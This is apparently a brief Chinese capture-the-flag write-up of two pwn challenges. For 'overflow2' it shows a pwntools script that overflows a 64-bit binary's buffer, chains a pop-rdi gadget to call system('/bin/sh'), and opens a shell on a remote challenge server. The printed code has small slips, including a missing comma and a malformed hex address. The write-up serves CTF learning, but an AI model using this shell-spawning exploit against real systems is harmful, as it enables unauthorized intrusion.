瑞士军刀
打开题目
利用Kali连接 ls查看
得到flag
overflow2
题目
给了个nc和文件 下载 解压
在kali中使用file命令查看文件类型 可以看到是64位
使用IDA 64 Pro打开文件 查看主函数
寻找后门函数
system函数的地址是0×40043F
exp
from pwn import *
#sh = process('./pwn')
sh = remote('114.67.175.224' 10444)
sh.recvuntil('Please Input your name')
pop_rdi_ret = 0x40126b
system_addr = 0x40043F
binsh_addr = 0x402004
payload = b'a' * 32 + p64(1) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.send(payload)
sh.interactive()
得到flag